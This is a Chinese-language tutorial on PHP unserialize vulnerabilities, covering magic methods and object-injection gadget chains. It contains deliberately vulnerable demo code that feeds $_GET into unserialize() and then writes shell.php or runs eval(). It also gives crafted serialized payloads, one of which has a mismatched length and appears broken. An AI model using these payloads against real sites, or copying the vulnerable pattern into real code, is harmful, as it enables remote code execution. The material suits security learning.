php反序列化浅谈

0x01 serialize()和unserialize()

先介绍下几个函数

serialize()是用于将类转换为一个字符串

unserialize()用于将字符串转换回一个类

serialize()

<?php
class test{
    var $a = 'yicunyiye';
}

$p = new test();
$ser = serialize($p);

echo $ser;
?>

输出为

O:4:"test":1:{s:1:"a";s:9:"yicunyiye";}

这里O是说明为对象为4个字符，1是表示只有一个值{}里面的s表示为字符串为1就是变量a的长度，然后就是9表示值的长度

unserialize()

<?php
class test{
    var $a = 'yicunyiye';
}

$p = new test();
// $ser = serialize($p);

$a = 'O:4:"test":1:{s:1:"a";s:9:"yicunyiye";}';
$unser = unserialize($a);
print_r($unser);

?>

输出为

test Object ( [a] => yicunyiye )

这里的test为对象[a] => yicunyiye 为 $a = "yicunyiye"

0x02 漏洞产生

当我们传入给unserialize()参数可控的时候就可以利用

Magic function

php中有一类特殊的方法叫做“Magic function”

构造函数__construct()：当对象创建（new）时会自动调用。但在unserialize()时是不会自动调用的

析构函数__destruct()：当对象被销毁时会自动调用。

__wakeup()：如前所提，unserialize()时会自动调用

<?php
header("Content-type: text/html;charset=utf-8");
class test{
    var $test='123';
    function __wakeup(){
        echo "__wakeup"."<br>";
    }
    function __construct(){
        echo "__construct"."<br>";
    }
    function __destruct(){
        echo "__destruct"."<br>";
    }
}
echo "serialize:====="."<br>";
$data=new test;
$data=serialize($data);

echo "unserialize:====="."<br>";
$jm=unserialize($data);
print_r($jm);
?>

输出结果为

serialize:=====
__construct
__destruct
unserialize:=====
__wakeup
test Object ( [test] => 123 ) __destruct

wakeup() 或destruct()由前可以看到，unserialize()后会导致wakeup() 或destruct()的直接调用，中间无需其他过程。因此最理想的情况就是一些漏洞/危害代码在wakeup() 或destruct()中，从而当我们控制序列化字符串时可以去直接触发它们

因此我们写一个

<?php
class aaaa{
    var $test = '123';
    function __wakeup(){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$this->test);
        fclose($fp);
    }
}
$class3 = $_GET['test'];
print_r($class3);
echo "</br>";
$class3_unser = unserialize($class3);
require "shell.php";
// 为显示效果，把这个shell.php包含进来
?>

url为：http://127.0.0.1/m/index.php?test=O:4:"aaaa":1:{s:4:"test";s:19:"<?php phpinfo(); >";}

这里可以看到只要传入给test就行了

其他Magic function的利用,如果用construct()其实是一样的只需要一步步溯源回去即可

<?php
class con{
    function __construct($test){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$test);
        fclose($fp);
    }
}
class wake{
    var $test = '123';
    function __wakeup(){
        $obj = new con($this->test);
    }
}
$class5 = $_GET['test'];
print_r($class5);
echo "</br>";
$class5_unser = unserialize($class5);
require "shell.php";
?>

payload:O:4:"wake":1:{s:4:"test";s:18:"";}

利用普通成员方法

前面谈到的利用都是基于“自动调用”的magic function。但当漏洞/危险代码存在类的普通方法中，就不能指望通过“自动调用”来达到目的了。这时的利用方法如下，寻找相同的函数名，把敏感函数和类联系在一起。

比如这里

<?php
class chybeta {
    var $test;
    function __construct() {
        $this->test= new ph0en1x(); //实例化ph0en1x
    }
    function __destruct() {
        $this->test->action(); //调用ph0en1x类里的action()函数
    }
}
class ph0en1x {
    function action() {
        echo "ph0en1x";
    }
}
class ph0en2x {
    var $test2;
    function action() {
        eval($this->test2);
    }
}
$class6 = new chybeta();
unserialize($_GET['test']);
?>

我们的payload修改为

<?php
class chybeta{
    var $test;
    function __construct(){
        $this->test = new ph0en2x();
    }
}

class ph0en2x{
    var $test2 = "phpinfo();";
}

$class6 = new chybeta();
$payload = serialize($class6);
echo $payload;
?>

执行payload为：

O:7:"chybeta":1:{s:4:"test";O:7:"ph0en2x":1:{s:5:"test2";s:10:"phpinfo();";}}